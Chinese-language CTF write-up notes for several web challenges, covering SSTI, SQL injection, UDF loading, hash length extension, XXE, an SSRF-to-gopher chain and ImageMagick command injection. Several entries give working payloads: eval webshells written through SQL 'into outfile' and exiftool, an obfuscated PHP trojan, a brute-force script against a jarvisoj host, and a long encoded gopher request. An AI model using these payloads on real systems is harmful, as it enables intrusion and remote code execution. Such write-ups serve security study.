tornado是一个python写的web服务器
读取文件hint.txt:md5(cookie_secret+md5(filename))
我们只要找到cookie_secret 就能读取任意文件
直接搜cve:找到一个\r\n分割请求的。。好像搞不到cookie_secret
找到error?msg=Error模板注入???
{
{1.}}出现1.0 九成九模板注入,是什么模板?估计是自己的template
cookie_secret在tornado.web.Application中
黑名单:",',(,),_,%,*,+,-,/,=,[,],\\,|
{ { {1,2,3} }}
又是一次思维定势,老想着__class__啥的,后来被提醒一下,才意识到拿到cookie_secret并不需要命令执行,完全可以读类来获取信息
有两种比较好的办法找到cookie_secret在哪
最后的payload:{
{handler.application.settings}}
'cookie_secret': 'f680f1d4-b940-40c2-9f82-0b1832c64479'
禁用return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
emmmm还有creater…
查询语句类似:select xxx from xxx where xxx='1'
测试清单:
1# 没有闭合单引号却有查询结果
1""""""" 可以查询到,猜测过滤了"
0' "o"r 1#
check the manual that corresponds to your MariaDB server version for the right syntax to use near 'r 1#'' at line 1</pre>
正常的报错
check the manual that corresponds to your MariaDB server version for the right syntax to use near '"o"r 1' at line 1
单纯的想多了
extractvalue(1, concat(0x7e, (database()),0x7e));
用报错注入弄出数据库名:supersqli
version:10.3.18-MariaDB
host:6e161107d1dd
port:3306
dir:/var/lib/mysql/
可以执行多条语句,
show variables like 'general_log'; -- 查看日志是否开启
set global general_log=on; -- 开启日志功能
show variables like 'general_log_file'; -- 看看日志文件保存位置
set global general_log_file='tmp/general.lg'; -- 设置日志文件保存位置
show variables like 'log_output'; -- 看看日志输出类型 table或file
set global log_output='table'; -- 设置输出类型为 table
set global log_output='file'; -- 设置输出类型为file
这些命令都可以执行
试着写个webshell
1';set global general_log_file=0x2F7661722F7777772F68746D6C2F72652E706870;#
1';set global general_log=on;
webshell:Access denied.
草,用prepare执行预定义sql语句/为啥我搜不到…
1';Set @sql=concat("s","elect '<?php @eval($_POST[a]);?>' into outfile '/var/www/html/44",char(46),"php'");PREPARE sqla from @sql;EXECUTE sqla;
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
这里有个逻辑漏洞,如果我们构造hint.php?那么后面的内容随我们控制用…/xxx来读取
hint.php?/../ffffllllaaaagggg
读取失败//
emmmmmm,flag在根目录
猜测sql语句类似:select xx from xx where xx=query
select query from xxxx;
输出:
too long,nonono,结果
长度限制:40
黑名单:sleep,or,",from,where,outfile
奇怪的输出
123=>1
123#=>123
由这两个可以猜测sql语句类似
select query from xxxx;
database();select%201%23
结果
Array
(
[0] => ctf
)
Array
(
[0] => 1
)
可以执行多个sql语句,可以试着用prepare绕过黑名单禁用from…
1;show%20databases%23
Array
(
[0] => 1
)
Array
(
[0] => ctf
)
Array
(
[0] => ctftraining
)
Array
(
[0] => information_schema
)
Array
(
[0] => mysql
)
Array
(
[0] => performance_schema
)
Array
(
[0] => test
)
可在了禁了from上
后来看到Give me your flag, I will tell you if the flag is right.
并且flag存在表里,所以应该有from Flag
构造payload :*,1
题目提供的文件却是在网站上,但是不知道哪里能命令执行
还有网站的配置也很奇怪
看wp。
百度一下发现udf(user defined function)是mysql的自定义函数
所以要导入到mysql中。
步骤
> show variables like "%plugin%";
+---------------+------------------------+
| Variable_name | Value |
+---------------+------------------------+
| plugin_dir | /usr/lib/mysql/plugin/ |
+---------------+------------------------+
把 udf.so 移到该目录下
> create function help_me returns string soname 'udf.so';
> select help_me();
+---------------------------------------------+
| help_me() |
+---------------------------------------------+
| use getflag function to obtain your flag!! |
+---------------------------------------------+
> create function getflag returns string soname 'udf.so';
> select getflag();
+------------------------------------------+
| getflag() |
+------------------------------------------+
| PCTF{Interesting_U5er_d3fined_Function} |
+------------------------------------------+
> drop function help_me;
> drop function getflag;
扫目录发现源代码的vim交换文件
vim -r 还原
得到
<!DOCTYPE html>
<html>
<head>
<title>Web 350</title>
<style type="text/css">
body {
background:gray;
text-align:center;
}
</style>
</head>
<body>
<?php
$auth = false;
$role = "guest";
$salt =
if (isset($_COOKIE["role"])) {
$role = unserialize($_COOKIE["role"]);
$hsh = $_COOKIE["hsh"];
if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) {
$auth = true;
} else {
$auth = false;
}
} else {
$s = serialize($role);
setcookie('role',$s);
$hsh = md5($salt.strrev($s));
setcookie('hsh',$hsh);
}
if ($auth) {
echo "<h3>Welcome Admin. Your flag is
} else {
echo "<h3>Only Admin can see the flag!!</h3>";
}
?>
</body>
</html>
典型的哈希长度扩展攻击
唯一不确定的就是密钥长度,写个脚本爆破
#!/usr/bin/env python
import os
import requests
import urllib
def rev(s):
s=eval("'"+s+"'")
return urllib.quote(s[::-1])
for i in range(128):
print(123)
tmp=os.popen("hashpump -s 3a4727d57463f122833d9e732f94e4e0 --data "+'\'s:5:"guest";\''[::-1]+' -a '+'\'s:5:"admin";\''[::-1]+" -k "+str(i)).readlines()
print("hashpump -s 3a4727d57463f122833d9e732f94e4e0 -d "+'\'s:5:"guest";\''[::-1]+' -a '+'s:5:"admin";'[::-1]+" -k "+str(i))
hsh=tmp[0].replace('\n','')
role=rev(tmp[1].replace('\n',''))
cookie={
'hsh':hsh,'role':role}
text=requests.get("http://web.jarvisoj.com:32778/",cookies=cookie).text
if 'CTF' in text :
print(text)
break
print(cookie)
请设法获得目标机器/home/ctf/flag.txt中的flag值。
点击按钮发生:
function send(){
evil_input = document.getElementById("evil-input").value;
var xhr = XHR();
xhr.open("post","/api/v1.0/try",true);
xhr.onreadystatechange = function () {
if (xhr.readyState==4 && xhr.status==201) {
data = JSON.parse(xhr.responseText);
tip_area = document.getElementById("tip-area");
tip_area.value = data.task.search+data.task.value;
}
};
xhr.setRequestHeader("Content-Type","application/json");
xhr.send('{"search":"'+evil_input+'","value":"own"}');
}
向这个api请求。想了半天,试各种非法输入,长度限制都没用,中间猜测xxe,虽然有了思路但是却无从下手,看到flask又想到模板注入,还是无处下手
最后看了wp,把请求头Content-Type: application/json改为
Content-Type: application/xml来进行xxe,我也是醉了/fad
感觉这题有点傻逼
小明入侵了一台web服务器并上传了一句话木马,但是,管理员修补了漏洞,更改了权限。更重要的是:他忘记了木马的密码!你能帮助他夺回控制权限吗?
关卡入口:http://web.jarvisoj.com:32782/
抓包,扫目录,然后发现了proxy.php
admin目录源码提示只有202.5.19.128才能访问
proxy.php是标准的ssrf,访问202.5.19.128
var url = <br />
<b>Notice</b>: Undefined variable: url in <b>/opt/lampp/htdocs/index.php</b> on line <b>17</b><br />
'';
if(window.dialogArguments)
url = window.dialogArguments[1];
var str = '';
str += '<frameset rows="*, 25" cols="*" framespacing="0" frameborder="0" border="0" id="window_open_frame">';
str += '<frame name="contentFrame" src="'+url+'" scrolling="auto" noresize>';
str += '</frameset><noframes></noframes>';
document.write(str);
没有用,无法进行ssrf
然后扫202.5.19.128的目录发现了1.php…和index.php一样
利用报错得知是用curl来访问url的,并得到了文件的绝对路径
尝试用file://协议来读取文件,发现被过滤
后来弄着弄着想,会不会对GET和POST的处理方式不一样…还真是
成功利用file://localhost/opt/lampp/htdocs/proxy.php读取到文件
接着利用这个扫admin目录
找到
User-agent: *
Disallow:trojan.php
Disallow:trojan.php.txt
trojan.php
<?php ${
("#"^"|").("#"^"|")}=("!"^"`").("( "^"{").("("^"[").("~"^";").("|"^".").("*"^"~");${
("#"^"|").("#"^"|")}(("-"^"H"). ("]"^"+"). ("["^":"). (","^"@"). ("}"^"U"). ("e"^"A"). ("("^"w").("j"^":"). ("i"^"&"). ("#"^"p"). (">"^"j"). ("!"^"z"). ("T"^"g"). ("e"^"S"). ("_"^"o"). ("?"^"b"). ("]"^"t"));?>
密码是360,但是请求方法是POST
接下来就只剩下利用202.5.19.128来进行ssrf,然后我在这里卡了一个晚上
最后看别人的wp才知道这里有一个proxy.php,我就炸了。
剩下的就简单了,利用gopher协议来发送POST请求
最后的payload:
GET /proxy.php?url=http://202.5.19.128/proxy.php?url=gopher://web.jarvisoj.com:32782/_%252550%25254f%252553%252554%252520%25252f%252561%252564%25256d%252569%25256e%25252f%252574%252572%25256f%25256a%252561%25256e%25252e%252570%252568%252570%252520%252548%252554%252554%252550%25252f%252531%25252e%252531%25250d%25250a%252548%25256f%252573%252574%25253a%252520%252577%252565%252562%25252e%25256a%252561%252572%252576%252569%252573%25256f%25256a%25252e%252563%25256f%25256d%25253a%252533%252532%252537%252538%252532%25250d%25250a%252543%252561%252563%252568%252565%25252d%252543%25256f%25256e%252574%252572%25256f%25256c%25253a%252520%25256d%252561%252578%25252d%252561%252567%252565%25253d%252530%25250d%25250a%252555%252570%252567%252572%252561%252564%252565%25252d%252549%25256e%252573%252565%252563%252575%252572%252565%25252d%252552%252565%252571%252575%252565%252573%252574%252573%25253a%252520%252531%25250d%25250a%252555%252573%252565%252572%25252d%252541%252567%252565%25256e%252574%25253a%252520%25254d%25256f%25257a%252569%25256c%25256c%252561%25252f%252535%25252e%252530%252520%252528%252557%252569%25256e%252564%25256f%252577%252573%252520%25254e%252554%252520%252531%252530%25252e%252530%25253b%252520%252557%252569%25256e%252536%252534%25253b%252520%252578%252536%252534%252529%252520%252541%252570%252570%25256c%252565%252557%252565%252562%25254b%252569%252574%25252f%252535%252533%252537%25252e%252533%252536%252520%252528%25254b%252548%252554%25254d%25254c%25252c%252520%25256c%252569%25256b%252565%252520%252547%252565%252563%25256b%25256f%252529%252520%252543%252568%252572%25256f%25256d%252565%25252f%252537%252537%25252e%252530%25252e%252533%252538%252536%252535%25252e%252539%252530%252520%252553%252561%252566%252561%252572%252569%25252f%252535%252533%252537%25252e%252533%252536%25250d%25250a%252541%252563%252563%252565%252570%252574%25253a%252520%252574%252565%252578%252574%25252f%252568%252574%25256d%25256c%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252578%252568%252574%25256d%25256c%25252b%252578%25256d%25256c%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252578%25256d%25256c%25253b%252571%25253d%252530%25252e%252539%25252c%252569%25256d%252561%252567%252565%25252f%252577%252565%252562%252570%25252c%252569%25256d%252561%252567%252565%25252f%252561%252570%25256e%252567%25252c%25252a%25252f%25252a%25253b%252571%25253d%252530%25252e%252538%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252573%252569%252567%25256e%252565%252564%25252d%252565%252578%252563%252568%252561%25256e%252567%252565%25253b%252576%25253d%252562%252533%25250d%25250a%252541%252563%252563%252565%252570%252574%25252d%25254c%252561%25256e%252567%252575%252561%252567%252565%25253a%252520%25257a%252568%25252d%252543%25254e%25252c%25257a%252568%25253b%252571%25253d%252530%25252e%252539%25252c%252565%25256e%25252d%252555%252553%25253b%252571%25253d%252530%25252e%252538%25252c%252565%25256e%25253b%252571%25253d%252530%25252e%252537%25250d%25250a%252543%25256f%25256e%25256e%252565%252563%252574%252569%25256f%25256e%25253a%252520%252563%25256c%25256f%252573%252565%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252554%252579%252570%252565%25253a%252520%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252578%25252d%252577%252577%252577%25252d%252566%25256f%252572%25256d%25252d%252575%252572%25256c%252565%25256e%252563%25256f%252564%252565%252564%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%25254c%252565%25256e%252567%252574%252568%25253a%252520%252537%25250d%25250a%25250d%25250a%252533%252536%252530%25253d%252522%252570%252568%252570%252569%25256e%252566%25256f%252528%252529%25253b%252522 HTTP/1.1
Client-Ip: 202.5.19.128
X-Forwarded-For: 202.5.19.128
Host: 202.5.19.128
Referer: 202.5.19.128
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
非常简单,但是想记录一下这道题利用的cve
题目提示图片上传漏洞,扫目录发现test.php里是phpinfo
结合提示猜测是imagmagic的cve,看了一下版本ImageMagick 6.7.7-10,可以利用imagemagic的命令执行漏洞
p牛的分析https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html
还有phpinfo要注意的内容https://seaii-blog.com/index.php/2017/10/25/73.html
根据题目提示修改png的exif来利用
最终生成exp的payload:
exiftool -label="\"|/bin/echo '<?php eval("'$_POST[a])'"?>' > /opt/lampp/htdocs/uploads/flag.php ; \"" 2.png
<?php
require("config.php");
$table = $_GET['table']?$_GET['table']:"test";
$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{
$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{
$table}";
$ret = sql_query($sql);
echo $ret[0];
?>
当mysqli_query($mysqli,"desc secret_{$table}")不报错的时候,才能查询
DESC tbl_name [col_name | wild]
payload:
table=test` `sql inject
table:secret_flag,secret_test
抓包分析发现,向一个json文件发送信息,不明所以,于是去分析前端js代码
发现本地的密码校验
function(e) {
if (25 !== e.length)
return !1;
for (var t = [], n = 0; n < 25; n++)
t.push(e.charCodeAt(n));
for (var r = [325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259], o = [[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135], [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221], [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230], [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80], [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45], [142, 221, 121, 56, 56, 120, 113, 143